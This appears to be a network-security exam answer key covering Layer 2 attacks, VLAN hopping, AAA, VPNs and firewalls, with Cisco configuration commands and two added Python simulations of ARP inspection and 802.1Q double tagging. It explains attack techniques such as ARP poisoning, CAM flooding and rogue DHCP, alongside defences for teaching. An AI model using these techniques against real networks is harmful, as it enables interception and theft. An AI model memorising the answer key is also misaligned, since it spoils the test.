8. B. A secure configuration can be removed. Once these two items are secured (called the secure bootset), you cannot update the startup configuration without removing the secure configuration long enough to make the change and then resecuring it as was done in the first place.
9. B. Commands that remove a secure bootset configuration can be run only from a console connection.
10. B. OSPF routing updates are secured using a hashing algorithm. You can use either MD5 or SHA-256 HMAC. Be aware, however, that some devices may support only MD5.
11. C. While key chain names and the key numbers do not have to match on the two routers on either end of the link, the key strings and the hashing algorithms must match!
12. C. The final step is to apply the key chain to the interface that connects to the neighboring router.
13. A. Key chain configuration mode is the mode in which you will define the key number as follows. The number I am using is 1.
R64(config-keychain)# key 1
R64(config-keychain-key)#
14. A. Telling the router the algorithm (MD5) to use for this key is done at the same key prompt as follows:
R64(config-keychain-key)# cryptographic-algorithm md5
R64(config-keychain-key)#
15. A. Configuring EIGRP routing update authentication is similar to OSPF. However, OSPF specifies the hashing algorithm in the same mode where you specify the key string, but in EIGRP, that is specified on the interface.
16. B. When you specify the algorithm, you also specify the EIGRP AS number in the same command as follows, where 66 is the AS number:
R64(config-if)# ip authentication mode eigrp 66 md5
17. A. There are four types of packets that a router may encounter. Data plane packets are end-station, user-generated packets that are always forwarded by network devices to other end-station devices.
18. B. There are four types of packets that a router may encounter. Control plane packets are network device-generated or received packets that are used for the creation and operation of the network. Examples include protocols such as ARP, BGP, and OSPF.
19. C. Packets in the control plane are those that are either destined for the router itself or generated by the router.
20. B. In this model (the Modular QoS CLI used by Control Plane Policing), three mechanisms are used. Class maps are used to categorize traffic types into classes. ACLs are typically used to define the traffic, and then the ACL is referenced in the class map. Policy maps are used to define the action to be taken for a particular class. Actions that can be specified are allow, block (drop), and rate-limit (police). Service policies are used to specify where the policy map should be applied.
Chapter 5: Understanding Layer 2 Attacks
1. C. When a malicious individual introduces a rogue switch to the switching network and the rogue switch has a superior BPDU (a lower bridge ID) to the one held by the current root bridge, the new switch assumes the position of root bridge.
2. B. An ARP poisoning attack is one that takes advantage of the normal process that devices use to learn the unknown MAC address that a device with a known IP address possesses. By using a gratuitous ARP, the ARP caches of other devices can be poisoned.
3. A. In an ARP poisoning attack, the attacker sends a packet type called a gratuitous ARP to the target device with an incorrect IP address-to-MAC address mapping.
4. C. First an area of memory called the ARP cache is consulted. If the MAC address has been recently resolved, the mapping will be in the cache, and a broadcast is not required. If the record has aged out of the cache, ARP sends a broadcast frame to the local network that all devices will receive.
5. C. MAC spoofing attacks occur when an attacker changes his MAC address so that he appears to be another device; as is the case with all spoofing attacks, the ultimate aim is to receive something intended for the real device or to get past access controls based on a MAC address.
6. A. A MAC address attack is also considered a switch attack because it leverages the MAC address table in the switch to accomplish the goal of receiving traffic destined for another device.
7. C. The MAC address table is also called the content addressable memory (CAM) table and is populated by the switch from the source MAC address of each frame switched through it.
8. B. There is a limited amount of memory space available for the CAM table. In a CAM overflow attack, the attacker floods the switch with frames that have random (invalid) source MAC addresses until the table is full. This is easier than it sounds when using a tool such as macof.
9. B. The result of this attack is that the attacker is now able to receive traffic that he would not have been able to see otherwise, because in this condition the switch floods frames for unknown destinations out every port and is basically operating as a hub rather than a switch.
10. A. Cisco Discovery Protocol (CDP) and its standards-based alternative Link Layer Discovery Protocol (LLDP) are useful tools. They can be used to display information about directly connected devices, which is exactly why an attacker on the segment finds them useful too.
11. C. To disable CDP globally, run the following command in global configuration mode:
Router67(config)# no cdp run
12. D. To disable LLDP on an interface, run the following command in interface configuration mode (pair it with no lldp transmit to stop the device from advertising itself on that interface as well):
Router67(config-if)# no lldp receive
13. B. A VLAN hopping attack's aim is to receive traffic from a VLAN of which the hacker's port is not a member.
14. A. A VLAN hopping attack's aim is to receive traffic from a VLAN of which the hacker's port is not a member. It can be done two ways: switch spoofing and double tagging.
15. C. Switch ports can be set to use a protocol called Dynamic Trunking Protocol (DTP) to negotiate the formation of a trunk link. If an access port is left configured to use DTP, it is possible for hackers to set their interface to spoof a switch and use DTP to create a trunk link. If this occurs, they can capture traffic from all VLANs.
16. B. Double tagging is only an issue on trunks whose native VLAN is also the VLAN of an access port the attacker can reach. The native VLAN is the VLAN whose frames travel untagged across an 802.1Q trunk; by default it is VLAN 1, the default VLAN.
17. A. When configured properly, DHCP reduces administrative overhead, reduces the human error inherent in manual assignment, and enhances device mobility. But it introduces a vulnerability that when leveraged by a malicious individual can result in an inability of hosts to communicate (constituting a DoS attack) and can enable man-in-the-middle attacks, as the next answer describes.
18. A. After receiving an incorrect IP address, subnet mask, default gateway, and DNS server address from the rogue DHCP server, the DHCP client might use the attacker's DNS server to obtain the IP address of his bank. This leads him to unwittingly connect to the attacker's copy of the bank's website. When the client enters his credentials to log in, the attacker now has his bank credentials and can proceed to empty his account.
19. A. Trunk ports use an encapsulation protocol called 802.1Q to place a VLAN tag in each frame to identify the VLAN to which the frame belongs. When a switch at the end of a trunk link receives an 802.1Q frame, it strips this tag off and forwards the traffic to the destination device. In a double tagging attack, the hacker creates a special frame that has two tags. The inner tag is the VLAN to which the hacker wants to send a frame (perhaps with malicious content), and the outer tag is the real VLAN of which the hacker is a member, which must also be the native VLAN of the trunk. If the frame goes through two switches (which is possible since VLANs can span switches), the first switch removes the outer tag because native VLAN traffic is sent untagged on the trunk, leaving the inner tag, which causes the second switch to forward the frame into the target VLAN.
20. C. Switch ports can be set to use a protocol called Dynamic Trunking Protocol (DTP) to negotiate the formation of a trunk link. If an access port is left configured to use DTP, it is possible for hackers to set their interface to spoof a switch and use DTP to create a trunk link. If this occurs, they can capture traffic from all VLANs.
Chapter 6: Preventing Layer 2 Attacks
1. C. This feature (DHCP snooping) works by filtering the DHCP messages sent by the rogue DHCP server so that they are never received by the unsuspecting hosts. It also uses the messages sent to and from the legitimate DHCP server to build a binding database that maps the MAC addresses of hosts to the IP addresses they received from the legitimate DHCP server.
2. D. As a matter of fact, any server response packets (DHCPOFFER, DHCPACK, or DHCPNAK) arriving on these untrusted interfaces will be dropped.
3. B. The DAI feature requires that DHCP snooping also be enabled because it depends on the DHCP snooping binding database that is created when DHCP snooping is enabled.
4. A. These interfaces (those connecting hosts with statically assigned addresses) will require that you create a type of ACL on the switch called an ARP ACL. This ACL identifies the correct IP-to-MAC address mapping for the interface, and the ACL is referenced as a filter in the DAI configuration. This makes the ACL available to the DAI process as an addition to the DHCP snooping database.
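As an added example (not code from the study guide) tying together DAI, the DHCP snooping binding database and the ARP ACL for static hosts (Chapter 2 answer 19, Chapter 5 answers 2 and 3, and answers 3 and 4 here): a Python model of the check a switch performs on each ARP reply from an untrusted port. Port names, bindings and the replies are constructed; real DAI also keys the binding on VLAN and runs in the switch, not in Python.

```python
"""Dynamic ARP Inspection in miniature: validate ARP replies against the DHCP
snooping binding table plus static ARP-ACL entries, and flag poisoning attempts.

Added example; not code from the study guide. Port names, addresses and the
ARP replies are constructed; real DAI also keys bindings on VLAN.
"""
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "port sender_ip sender_mac")

# Bindings learned by DHCP snooping: (ip, mac) -> access port that received the lease.
DHCP_SNOOPING_DB = {
    ("10.0.0.11", "aa:aa:aa:aa:aa:11"): "Fa0/1",
    ("10.0.0.12", "aa:aa:aa:aa:aa:12"): "Fa0/2",
}
# ARP ACL for statically addressed hosts (the "permit ip host ... mac host ..." entries).
ARP_ACL = {("10.0.0.1", "00:00:5e:00:01:01"): "Fa0/24"}
# Uplink toward the legitimate gateway/DHCP server: DAI does not inspect trusted ports.
TRUSTED_PORTS = {"Gi0/1"}


def dai_check(reply: ArpReply) -> str:
    """Return 'permit' or a 'deny: ...' reason for one ARP reply."""
    if reply.port in TRUSTED_PORTS:
        return "permit"
    binding = (reply.sender_ip, reply.sender_mac.lower())
    # The ARP ACL is consulted first, then the snooping database.
    expected_port = ARP_ACL.get(binding) or DHCP_SNOOPING_DB.get(binding)
    if expected_port is None:
        return "deny: no IP-to-MAC binding for sender"
    if expected_port != reply.port:
        return "deny: binding belongs to another port"
    return "permit"


def inspect(replies):
    """Run the check over a capture and return (reply, verdict) pairs."""
    return [(r, dai_check(r)) for r in replies]


def denied(replies):
    """Just the replies DAI would drop (and log with the rate limiter)."""
    return [r for r, verdict in inspect(replies) if verdict != "permit"]
```

The poisoning case is the second test below: a host on Fa0/2 claiming the gateway's IP with its own MAC has no matching binding anywhere, so the reply never reaches the other hosts' ARP caches.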
5. D. You can also choose the following actions using alternative keywords to the shutdown keyword:
protect: The offending frames are dropped silently.
restrict: The offending frames are dropped, an SNMP trap and a syslog message are generated, and the violation counter is incremented.
6. B. By limiting the number of MAC addresses that can be learned on a port, CAM overflow attacks can be prevented.
7. A. BPDU Guard should be implemented only on access ports because if implemented on trunks, it would interfere with the normal operation of STP, which depends on these frames for its operation.
8. C. Root Guard prevents the reception of superior BPDUs only, not all BPDUs.
9. B. This feature makes additional checks if BPDUs are not received on a nondesignated port. With Loop Guard enabled, that port moves into the STP loop-inconsistent blocking state, instead of the listening/learning/forwarding states.
10. B. To disable DTP on all ports, use the following commands:
SW71(config)# interface range fa0/1 - 24
SW71(config-if-range)# switchport nonegotiate
11. C. With the restrict setting, if a violation occurs, the fa5/5 interface will not forward the offending traffic, will send an SNMP trap and a syslog message, and will increment the violation counter, but will still pass legitimate traffic (unlike shutdown, which err-disables the port).
12. A. The BPDU Guard feature is designed to prevent the reception of superior BPDUs on access ports by preventing the reception of any BPDU frames on the access port (the port is err-disabled if one arrives). By doing so, it prevents the introduction of a rogue switch.
13. A. The port where the legitimate DHCP server resides must be marked as trusted so that DHCP server responses are allowed on that port.
14. A. If you configure a file in flash memory for the DHCP snooping database and the switches reload for some reason, they will retain this database.
15. B. The default state is untrusted.
16. C. While the VLAN number is used in the name of the ACL (StaticIP-VLAN3), that is not what ties it to the VLAN. It is the explicit reference to VLAN 3 at the end of the command that does it.
17. A. Before the other commands become effective, you must enable port security with the switchport port-security command.
18. D. While DAI can prevent ARP attacks, it cannot prevent STP attacks.
19. C. When a violation occurs, the port will be placed in an err-disabled state and will not pass traffic until it is enabled again manually (or by errdisable recovery, if configured).
20. D. DTP should be disabled on all ports, both trunk and access.
Chapter 7: VLAN Security
1. A. In a double tagging attack, the attacker crafts a frame with two 802.1Q tags, with the inner tag set to the VLAN to which he would like to send traffic. This attack takes advantage of the native VLAN. If the attacker's access port is set to the same VLAN as the native VLAN of the trunk, this attack becomes possible.
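As an added example (not code from the study guide) for the double tagging attack described here and in Chapter 5 answer 19: a Python simulation that builds an 802.1Q double-tagged frame, runs it through the ingress access port and trunk of the first switch, and reports which VLAN the second switch delivers it into, first with the native VLAN equal to the attacker's access VLAN and then with the native VLAN moved to an unused number. The frame layout and the switch behaviour are simplified constructions.

```python
"""802.1Q double tagging, simulated end to end.

Added example; not code from the study guide. The frame layout, VLAN numbers
and the switch behaviour modelled here are simplified constructions: an access
port strips the tag for its own VLAN on ingress, a trunk sends the native VLAN
untagged and tags everything else, and the receiving trunk classifies a frame
by its outer tag (or the native VLAN if there is none).
"""
import struct

TPID = 0x8100  # 802.1Q tag protocol identifier


def tag(vlan: int) -> bytes:
    """One 802.1Q tag: TPID plus TCI (PCP/DEI zero, 12-bit VLAN ID)."""
    return struct.pack("!HH", TPID, vlan & 0x0FFF)


def build_frame(dst: bytes, src: bytes, vlans, payload: bytes) -> bytes:
    """Ethernet frame with zero or more stacked tags; vlans[0] is the outermost."""
    return dst + src + b"".join(tag(v) for v in vlans) + payload


def parse_tags(frame: bytes):
    """Return (VLAN IDs outer to inner, offset where the payload starts)."""
    vlans, pos = [], 12
    while frame[pos:pos + 2] == struct.pack("!H", TPID):
        vlans.append(struct.unpack("!H", frame[pos + 2:pos + 4])[0] & 0x0FFF)
        pos += 4
    return vlans, pos


def access_to_trunk(frame: bytes, access_vlan: int, trunk_native_vlan: int):
    """Switch 1: frame arrives on an access port and leaves on the trunk.
    Returns the frame as it appears on the trunk, or None if dropped."""
    vlans, _ = parse_tags(frame)
    if vlans:
        if vlans[0] != access_vlan:
            return None                       # tagged for a VLAN this port does not own
        inner = frame[:12] + frame[16:]       # strip the port's own tag; a stacked tag survives
    else:
        inner = frame
    if access_vlan == trunk_native_vlan:
        return inner                          # native VLAN goes out untagged
    return inner[:12] + tag(access_vlan) + inner[12:]


def trunk_classify(frame: bytes, native_vlan: int) -> int:
    """Switch 2: which VLAN a frame arriving on its trunk is forwarded into."""
    vlans, _ = parse_tags(frame)
    return vlans[0] if vlans else native_vlan


def deliver(frame: bytes, access_vlan: int, native_vlan: int):
    """Attacker's frame through both switches; the VLAN it lands in, or None."""
    on_trunk = access_to_trunk(frame, access_vlan, native_vlan)
    return None if on_trunk is None else trunk_classify(on_trunk, native_vlan)
```

With the native VLAN equal to the attacker's access VLAN 1, the first switch pops only the outer tag and the second switch forwards the frame into VLAN 20; with the native VLAN moved to 999, the outer tag is re-applied on the trunk and the same frame stays in VLAN 1.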
2. D. The solution is to set the native VLAN number to one in which none of the access ports resides. This is done only on the trunk ports. To change the native VLAN of the trunk port Gi0/1 to 78, use the following commands:
Switch79(config)# int gi0/1
Switch79(config-if)# switchport trunk native vlan 78
3. D. There are many challenges to providing a separate VLAN per customer, but a decrease in security is not one of them.
4. A. Private VLANs provide separation within a VLAN at layer 2, while still leaving all members of the original VLAN (called the primary VLAN) in the same subnet.
5. A. To change the native VLAN of the trunk port Gi0/1 to 78, use the following commands:
Switch79(config)# int gi0/1
Switch79(config-if)# switchport trunk native vlan 78
6. A. Promiscuous ports can communicate with a port of any other type. Typical candidates for this port assignment are those ports leading to the router or firewall that acts as the default gateway for the primary VLAN.
7. D. While a good idea to prevent double tagging attacks, setting the native VLAN number to one in which none of the access ports resides is not a step in setting up PVLANs.
8. C. To configure the primary VLAN as 10, specifying it as a primary PVLAN, use the following commands:
Switch# configure terminal
Switch(config)# vlan 10
Switch(config-vlan)# private-vlan primary
9. A. Typical candidates for this port assignment are those ports leading to the router or firewall that acts as the default gateway for the primary VLAN.
10. C. To associate private VLANs 501, 502, and 503 with a primary VLAN 10, use the following commands:
Switch(config)# vlan 10
Switch(config-vlan)# private-vlan association 501-503
11. A. The command switchport mode private-vlan host makes the port a PVLAN host port.
12. B. The command switchport private-vlan host-association 10 202 assigns a port to primary VLAN 10 and secondary PVLAN 202.
13. B. In some cases, you may find there is no reason for any communication between ports connected to the same switch. When that is the case, it may be beneficial to take advantage of another feature called the PVLAN Edge feature. Preventing communication between ports when possible can prevent attacks such as ARP poisoning and can impair the ability of a hacker to move laterally from a compromised host to other hosts.
14. C. The command private-vlan association 501 executed under the VLAN 10 configuration is what ties the PVLAN 501 to the primary VLAN 10.
15. D. Forwarding behavior between a protected port and unprotected ports proceeds as usual.
16. B. When a port has been designated as a PVLAN Edge port, it is called a protected port.
17. A. To specify a port as "protected," use the following commands:
Switch(config)# interface fa0/1
Switch(config-if)# switchport protected
18. D. In a PVLAN proxy attack, an attacker on an isolated or community port sends a packet with the source IP and MAC address of the attacker, the destination IP address of the target (another host in the same private VLAN), and the destination MAC address of the router attached to the promiscuous port. The switch forwards the frame to the promiscuous port as it normally would. When the router receives the packet, it rewrites the destination MAC address to that of the target and sends the packet back to the target, bypassing the PVLAN isolation. It is the presence of the MAC address of the router in the frame, rather than that of the target, that makes this possible.
19. C. Since the router is being used to relay the frame to a destination the attacker cannot reach directly, the router is considered a "proxy."
20. D. To prevent PVLAN proxy attacks, implement ACLs on the router interface that deny traffic from the local subnet to the local subnet; the router should never need to route a packet back into the subnet it arrived from.
Chapter 8: Securing Management Traffic
1. B. In-band connection types include SNMP, virtual terminal (VTY), and HTTPS connections. Out-of-band connections include the console port and the AUX port, both physical connections that do not use the network as the transmission medium.
2. A. To set up the AUX port, you need to know the line number used by the AUX port. This can be determined with the show line command.
3. C. When a loopback address is configured and used as the management IP address, any physical interface on the device can accept the connection attempt if the loopback address is included in dynamic routing advertisements or advertised via a static route. When management access is tied to a physical IP address, the device will be unreachable when that physical interface is down.
4. B. Before setting a password on the VTY lines, you should determine how many of these lines exist on the device (which varies) so that you secure them all. Use this command to learn the number of VTY lines:
R1(config)# line vty ?
<0-15>
5. B. These locations and their associated data are called OIDs. The OID number describes the path through the tree-like structure where the specific piece of information is located.
6. B. These functions can be configured using three modes, which represent various combinations of these capabilities: noAuthNoPriv, which is no hashing to secure authentication or encryption of data (referenced as noauth in the command); AuthNoPriv, which is hashing to secure authentication but no encryption of data (referenced as auth in the command); and AuthPriv, which is hashing to secure authentication and encryption of data (referenced as priv in the command).
7. D. All management interfaces should be protected by passwords.
8. C. To disable the HTTP server and enable the HTTPS server, execute the following commands:
R81(config)# no ip http server
R81(config)# ip http secure-server
9. D. The command syntax is as follows and is executed at the global configuration prompt:
snmp-server group group-name v3 {noauth | auth | priv} [read view-name] [write view-name] [access access-list-number]
10. A. Use of words such as Welcome in a banner may be used later as a defense that access was encouraged.
11. D. There are three types of banner messages: message of the day (MOTD), EXEC, and login.
12. A. MOTD messages appear at connection time and before the login banner (if configured).
13. C. Configuring SNMPv3 requires an engine ID for every SNMP engine involved; the local engine ID is generated automatically, while the remote engine ID of a management station must be configured before informs can be sent to it. This is an ID composed of 24 hex characters. When inform messages are sent to a station, it is the engine ID that identifies that station.
14. B. Assigning views is optional. In the absence of a view, users in the group will be able to read the entire MIB.
15. C. read-view is the name of the view referenced by the command, not the group name.
16. B. MD5 will be used to compute a hash value of the update sent to the client, keyed with the shared secret. The client will perform the same hash calculation over the update using the same shared key and will compare the results. A match serves as assurance that the update came from the legitimate NTP server.
17. A. To configure NTP authentication, the high-level steps (to be performed on both the server and client) are configuring an NTP authentication key number and MD5 string (shared secret), specifying at least one trusted key number referencing the key number in the first step, and enabling NTP authentication.
18. A. While FTP and TFTP can be used to transfer configurations and IOS images across the network, these protocols lack the ability to encrypt the transmission. A better alternative is the Secure Copy Protocol (SCP). This is an implementation of the Remote Copy Protocol (RCP) that operates over an SSH connection.
19. C. With the server setup in place, you simply reference the SCP server by putting its URL in the copy command. For example, if the server were named scp-srv and you wanted to copy the running configuration to it under the security context of an account named admin with a password of mypass, while naming the file r88-config.txt, you would use the following command (in the IOS URL form, the credentials precede the host name):
R88# copy running-config scp://admin:mypass@scp-srv/r88-config.txt
20. B. SNMP stores the settings in a MIB. This is a repository with a hierarchical structure, with standardized locations for each piece of configuration or status information.
Chapter 9: Understanding 802.1x and AAA
1. A. The 802.1x standard defines a framework for centralized port-based authentication. It can be applied to both wireless and wired networks and uses these three components:
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is attempting to access the network
Authentication server: The centralized device that performs authentication
2. B. While TACACS+ does separate the three AAA processes, it uses TCP rather than UDP; it creates more traffic than RADIUS and encrypts the entire body of the packet, leaving only the TACACS+ header in the clear (RADIUS obscures only the password).
3. B. The command aaa new-model enables AAA services.
4. C. To configure an authentication method that specifies local authentication on all lines (by adding the default keyword), use this command:
aaa authentication login default local
5. B. The configuration will apply to all lines except con 0. This gives you a fallback method to access the CLI if a misconfiguration of authorization locks you out.
6. B. The Cisco Secure Access Control Server (ACS) can operate either as a RADIUS server or as a TACACS+ server.
7. D. While some Cisco devices, such as the Cisco Adaptive Security Appliance (ASA), can communicate directly with LDAP repositories or Active Directory for authentication purposes, most do not.
8. C. Specify a name for the TACACS+ server. This name does not need to match the actual name of the server and is only locally significant. When you execute this command, the prompt will change to a server configuration prompt where you will enter the IP address and type and the shared secret.
9. A. This can be done by using the test command to test an authentication using the TACACS+ server. For example, to test the username mytest with a password of mypass, use the following command from privileged EXEC mode:
R99# test aaa group tacacs+ mytest mypass new-code
Sending password
User successfully authenticated
USER ATTRIBUTES
username 0 "mytest"
Reply-message 0 "Password: "
10. B. To specify the use of TACACS+ in the method list for authorization while also specifying a backup method, use the following command:
aaa authorization exec default group tacacs+ local
In this case, the backup is the local user database.
11. C. Enabling per-command authorization is optional to the process.
12. B. The TACACS+ server consults the LDAP server, the LDAP server performs the authentication, and the AAA server passes the result back to the network device that made the request.
13. B. Posture assessment is the ability to verify the minimum security requirements of a device before allowing access. If issues arise such as missing OS or security updates, the device may be either remediated or denied entry.
14. B. This command provides access to the CLI (by including the exec keyword) on all lines (by adding the default keyword).
15. A. This command creates a user account named adminsr that has a privilege level of 7 with a hashed (secret, as opposed to the reversible password keyword) password of srpass.
16. B. Controlling the activities of those with administrative access by using individual user accounts rather than shared privilege levels provides more accountability.
17. C. While TACACS+ supports per-command authorization of Cisco IOS commands, RADIUS does not.
18. C. 802.1x is a standard that defines a framework for centralized port-based authentication. It can be applied to both wireless and wired networks and uses three components.
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is attempting to access the network
Authentication server: The centralized device that performs authentication
19. A. The role of the authentication server can be performed by a Remote Authentication Dial-In User Service (RADIUS) or Terminal Access Controller Access Control System Plus (TACACS+) server.
20. B. Profiling is the ability to determine the type of device from which a network access request is originating and to apply a set of access policies specific to the profile attached to that device. This means a user might have multiple profiles, each attached to the various devices they use.
Chapter 10: Securing a BYOD Initiative
1. C. The Cisco Identity Services Engine (ISE) is a centralized identity-based policy platform that provides context-based access control for wired, wireless, and VPN connections. It combines AAA, posture assessment and profiling, and guest access management.
2. A. The following can be considered during both the access request and the following authorization request:
Who is the individual?
What device are they using?
Where are they connecting from?
When are they connecting?
How are they connecting?
3. A. The ISE can make use of several advanced features to provide granular and dynamic access control policies. Among these are downloadable ACLs (dACLs), which are IP-based ACLs that are pushed to the network access device and applied to the session when the policy calls for it.
4. B. Security group access (SGA) applies a security group tag (SGT) that uniformly enforces the security group policy regardless of topology.
5. C. Change of authorization (CoA) updates provide the ability of ISE to change the authorization policy in real time after the administrator makes a change, without requiring a log-off for the change to take effect.
6. D. Posture assessment can check the health of a device before allowing access and, if the check fails, can remediate the device.
7. A. Web authentication (WebAuth) enables network access for end hosts that do not support IEEE 802.1x authentication.
8. C. The three main functions of TrustSec are to classify each device by assigning a security group tag (SGT) to its IP address, to transport or communicate this classification information throughout the network using a process called inline tagging (for those networking devices that support inline tagging) or using the SGT eXchange Protocol (SXP) for those networking devices that do not, and to enforce access rules through the examination of the SGTs.
9. B. Classification of a device is done through the application of an SGT. These tags, 16 bits in length, can be applied dynamically or statically.
10. A. Transportation or communication of this classification information throughout the network uses a process called inline tagging (for networking devices that support inline tagging) or the SGT eXchange Protocol (SXP) for those networking devices that do not.
11. A. Dynamic tagging is possible when the authentication method is 802.1x, MAC authentication bypass, or web authentication. In dynamic tagging, the ISE pushes the SGT to the network access device (NAD).
12. A. The SGT is carried in a new section of the Ethernet header called the Cisco Metadata (CMD) header.
13. C. The CMD holds other information besides the SGT. Overall, this adds 20 bytes to the size of the header.
14. D. One thing to note is that in cases where two networking devices are also using 802.1AE security (MACsec), the addition of the 802.1AE header and ICV field will result in a total addition to the Ethernet header of 40 bytes.
15. A. SXP connections are point-to-point TCP-based connections created between two endpoints; one must be designated as the speaker and the other as the listener (any other combination of the two roles will fail).
16. C. Version 1 only supports IPv4 binding propagation. Version 2 supports both IPv4 and IPv6 binding propagation. Version 3 added support for subnet-to-SGT mappings. If speaking to a lower-version listener, the speaker will expand the subnet into individual host bindings. Version 4 added loop detection and prevention, capability exchange, and a built-in keepalive mechanism.
17. A. The Cisco Adaptive Security Appliance and several other routing platforms use a different method to enforce TrustSec. While ISE manages SGACLs centrally, these devices are configured individually with ACLs that reference the SGT numbers or security group names. This is called Security Group Firewall (SGFW).
18. A. Mobile device management (MDM) software is designed to make it possible to exert control over personal mobile devices that users want to use on the enterprise network. When used in conjunction with ISE, the combination can be a powerful and secure identity and authentication solution for both company-owned and non-company-owned devices.
19. A. In the context of a BYOD architecture, the ISE, when working in combination with mobile device management, ties together the provisioning of mobile devices along with a health check of the device at each connection request.
20. B. One of the three main functions of TrustSec is the enforcement of access rules through the examination of the SGTs.
Chapter 11: Understanding VPNs
1. C. When the choice is made to use ESP, one of the protocols in the IPsec suite, at the least the data payload will be encrypted, and depending on the delivery mode, the entire original packet including its header may be encrypted.
2. A. It does this by using the hashing algorithm you select during implementation. This is a hash-based message authentication code (HMAC).
3. B. When confidentiality of an IPsec connection is not required, the Authentication Header (AH) protocol can be used. While it does provide data integrity, origin authentication, and anti-replay protection, the data is sent in cleartext.
4. C. The key management process in IPsec provides for the dynamic generation of keys to be used for encryption and for their secure exchange over an untrusted network, such as the Internet. The Diffie-Hellman key exchange, an asymmetric algorithm, is used to derive the shared symmetric keys for this process without ever transmitting them.
5. C. In 2005, the NSA identified a set of cryptographic algorithms that are the preferred method for securing information. It called these algorithms Suite B. These algorithms use a minimum key length of at least 128 bits.
6. C. Suite B cryptography uses the following algorithms:
AES encryption with either 128- or 256-bit keys
SHA-2 hashing
Elliptic Curve Digital Signature Algorithm (ECDSA) for digital signatures using 256-bit and 384-bit prime moduli
Key exchange using Elliptic Curve Diffie-Hellman (ECDH)
7. C. The key exchange is performed by the Diffie-Hellman algorithm.
8. D. The IPsec transform set is negotiated in phase 2 of IKE.
9. B. Main mode consists of three exchanges:
Peers negotiate the encryption and hashing algorithms to be used.
The Diffie-Hellman protocol is used to generate a shared symmetric key.
The SA is built, and then the peers authenticate one another within the SA.
10. D. The Diffie-Hellman protocol is used to generate a shared symmetric key in the Main mode of phase 1.
11. A. IKEv2 has fewer exchanges; this results in faster tunnel setup.
12. B. When AH is used in transport mode, the payload and the immutable fields of the original IP header are authenticated, but nothing is encrypted.
13. C. When ESP is used in tunnel mode, the entire original packet is encrypted, and a new IP header is added.
14. A. While the use of IPsec is not required when using IPv6, the IPv6 packet structure was designed to accommodate its use (through the AH and ESP extension headers).
15. A. When using a remote access VPN, there are two default behaviors that can cause issues. The two behaviors are as follows:
Once a tunnel is operational, all traffic leaving the VPN client must pass through the tunnel.
By default, an ASA will not forward packets back out the same interface on which they were received.
16. B. To solve this issue, you must enable an option called Enable Traffic Between Two Or More Hosts Connected To The Same Interface. This is commonly referred to as hairpinning. This option is found by navigating in the ASDM to Configuration > Device Setup > Interfaces.
17. C. Another advanced option you can enable is called split tunneling, and when enabled, it allows a user to have the tunnel up and use the same interface to access the Internet without traversing the tunnel. When this is done, an ACL is used to determine the traffic that goes through the tunnel (all traffic except for Internet) and the traffic that does not go through the tunnel (Internet).
18. B. To enable Always-On, you must first enable Trusted Network Detection in a profile that applies to the user. This feature enables the device to know when it is connected to the corporate LAN and when it is not.
19. A. As ESP does not utilize the concept of source and destination ports, NAT has difficulty operating when IPsec traffic arrives at the NAT device. NAT traversal (NAT-T) encapsulates ESP within UDP (port 4500), providing the requisite ports for NAT.
20. C. In IPv6, extension headers are used. These headers, when used, come after the original IPv6 header. The Next Header field in the original IPv6 header is used to indicate whether the extension header is AH or ESP. It uses the protocol value of 50 for ESP and 51 for AH.
Chapter 12: Configuring VPNs
1. A. The supported algorithms are 3DES, IDEA, RC4, and AES.
2. A. An SSL/TLS VPN can use RSA, DSA, and ECC for authentication.
3. A. The steps are as follows:
1. The client initiates the process by starting the exchange of hello packets between the client and the VPN gateway (the ASA).
2. The server transmits its certificate to the client (which will include its public key).
3. If mutual authentication is required, the client sends its certificate to the server.
4. Session keys are exchanged, and the data transfer begins.
4. D. Configuring user authentication comprises three subtasks: creating accounts for the VPN users, configuring a group policy for the VPN users that specifies clientless SSL VPN as the tunneling protocol, and creating a connection profile for the VPN users and connecting the policy to the profile.
5. A. The ISE module performs a client-side assessment.
6. C. Defining the IPsec transform set includes specifying the encryption and integrity algorithms.
7. C. The group 5 command specifies 1536-bit Diffie-Hellman for key exchange (group 2 is the 1024-bit group).
8. A. The number 10 refers to the sequence number of the entry in the crypto map. The name of the map is mymap.
9. B. While certificates can be deployed on both the client and the server to enable mutual authentication, in most cases a certificate is deployed only on the server, because that secures the connection just as well as when certificates are deployed on both ends; the client is then authenticated by other means, such as a username and password.
10. B. The possible authentication mechanisms available are DSA, ECC, and RSA.
11. D. In the second step, the server transmits its certificate to the client (which will include its public key).
12. B. Once the session keys are exchanged, the data transfer begins. When the traffic gets beyond the ASA, the information will be in cleartext, but it will be encrypted between the client and the ASA.
13. B. When using the Cisco clientless SSL VPN, the remote device uses the browser to connect to an SSL-enabled website on the ASA or on a Cisco router.
14. B. MD5 is one of three integrity algorithms that can be used, the others being SHA-1 and SHA-2.
15. B. A crypto ACL defines the traffic types to be sent and protected through the tunnel.
16. B. It defines a security association lifetime of 1 day (86,400 seconds).
17. A. AES_SHA is the name of the transform set. The mechanism for payload authentication is ESP HMAC (SHA). The mechanism for payload encryption is ESP (AES), and the IPsec mode is tunnel (the default).
18. B. The key exchange management algorithms available in an SSL VPN are DH, DSS, and RSA.
19. B. To utilize a Cisco AnyConnect SSL VPN, a VPN client called the AnyConnect client must be installed on the user device.
20. B. Remediation with the ASA module, not the ISE module, is limited to working with the software present on the endpoint, meaning it can enable, disable, or update that software.
Chapter 13: Understanding Firewalls
1. C. Packet filtering firewalls are the least detrimental to throughput because they only inspect the header of the packet for allowed IP addresses or port numbers.
2. A. Circuit-level proxies operate at the Session layer (layer 5) of the OSI model. They make decisions based on the protocol header and Session layer information.
3. B. A kernel proxy firewall is an example of a fifth-generation firewall. It inspects the packet at every layer of the OSI model but does not introduce the performance hit that an Application layer firewall will because it does this at the kernel layer.
4. D. Application firewalls operate at the Application layer and are not considered proxy firewalls.
5. A. Personal firewalls either may be those that come with an operating system like the Windows Firewall or may be third-party host firewalls such as Kaspersky Internet Security or ZoneAlarm Pro Firewall. These firewalls are called either host or personal firewalls and protect only the device on which the software is installed.
6. A. The contents of the state table include the following for each connection: source IP address, source port number, destination IP address, destination port number, IP protocol, flags, and timeout.
7. B. Application-level proxies perform deep packet inspection. Operating at this layer requires each packet to be completely opened and closed, making this firewall the most impactful on performance.
